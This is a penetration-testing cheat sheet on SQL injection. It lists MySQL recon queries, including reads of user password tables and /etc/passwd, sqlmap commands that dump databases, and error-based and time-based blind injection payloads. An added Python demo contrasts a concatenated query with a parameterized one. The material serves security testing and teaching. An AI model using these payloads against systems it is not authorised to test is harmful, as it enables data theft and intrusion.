SQL injection is a common web application vulnerability in which attacker-supplied input is interpreted as SQL code by the back-end database. An attacker who knows the correct syntax for injecting SQL commands into an application's back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as they are one of the most frequently used attacks in today's digital world.
The purpose of this cheat sheet is to provide quick, accurate, ready-to-use commands and the necessary sqlmap queries to help you test for SQL injection.
Basics of SQL:
S. No. | Parameters | SQL Queries/Examples |
---|---|---|
1. | | SELECT @@version; |
2. | | /* */ or # |
3. | | SELECT user(); || SELECT system_user() |
4. | | SELECT user FROM mysql.user; |
5. | | SELECT host, user, password FROM mysql.user; |
6. | | SELECT database() |
7. | | SELECT schema_name FROM information_schema.schemata; || SELECT distinct(db) FROM mysql.db |
8. | | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
9. | | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
10. | | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; |
11. | | SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # >= 5.0.12 |
12. | | UNION ALL SELECT LOAD_FILE('/etc/passwd') |
13. | Hostname/IP Address | SELECT @@hostname; |
14. | | CREATE USER test1 IDENTIFIED BY 'pass1'; |
15. | | SELECT @@datadir; |
Basic Commands of SQLMap:
S. No. | Parameters | SQLMap Queries Syntax |
---|---|---|
1. | | sqlmap -u "Vulnerable URL" --dbs |
2. | | sqlmap -u "Vulnerable URL" --tables -D [Name of database] |
3. | | sqlmap -u "Vulnerable URL" --columns -D [Name of database] -T [table name] |
4. | | sqlmap -u "Vulnerable URL" --dump -D [Name of database] -T [table name] |
Manual Attacks on SQLMap:
S. No. | Manual Attack Parameters | SQLMap Queries/Examples |
---|---|---|
1. | Quick detect INTEGERS | select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) |
2. | Quick detect STRINGS | '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' |
3. | Clear SQL Test | product.php?id=4 product.php?id=5-1 product.php?id=4 OR 1=1 product.php?id=-1 OR 17-7=10 |
4. | Blind SQL Injection | SLEEP(25)-- SELECT BENCHMARK(1000000,MD5('A')); |
5. | Real world sample | ProductID=1 OR SLEEP(25)=0 LIMIT 1-- ProductID=1) OR SLEEP(25)=0 LIMIT 1-- ProductID=1' OR SLEEP(25)=0 LIMIT 1-- ProductID=1') OR SLEEP(25)=0 LIMIT 1-- ProductID=1)) OR SLEEP(25)=0 LIMIT 1-- ProductID=SELECT SLEEP(25)-- |
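The "Clear SQL Test" row works because a vulnerable page concatenates the id value into the query text, so the database evaluates 5-1 as arithmetic and returns the same record as id=4. The following added example (not from the original article; the in-memory SQLite table, the function names and the sample rows are constructed assumptions standing in for the MySQL back end of product.php) runs those four inputs against a concatenated query and against a validated, parameterized one.

```python
import re
import sqlite3

# The four "Clear SQL Test" values from the table above.
CLEAR_TESTS = ["4", "5-1", "4 OR 1=1", "-1 OR 17-7=10"]


def make_db():
    # Constructed sample data; SQLite stands in for the MySQL back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(3, "lamp"), (4, "chair"), (5, "desk")])
    return db


def lookup_vulnerable(db, raw_id):
    # Vulnerable: the request value becomes part of the SQL text, so the
    # database parses it as an expression instead of treating it as data.
    sql = "SELECT name FROM products WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]


def lookup_hardened(db, raw_id):
    # Hardened: reject anything that is not a plain ASCII integer, then bind
    # the value as a parameter. The SQL text is constant, so input can never
    # change the structure of the query.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in db.execute(sql, (int(raw_id),))]


def compare(inputs):
    # Map each input to (vulnerable result, hardened result).
    db = make_db()
    return {value: (lookup_vulnerable(db, value), lookup_hardened(db, value))
            for value in inputs}


if __name__ == "__main__":
    for value, (vuln, safe) in compare(CLEAR_TESTS).items():
        print(f"id={value!r:18} vulnerable={vuln} hardened={safe}")
```

When auditing an application, identical responses for id=4 and id=5-1 from the concatenated path are the signal to fix; after the change, only the literal integer returns a row.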
You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.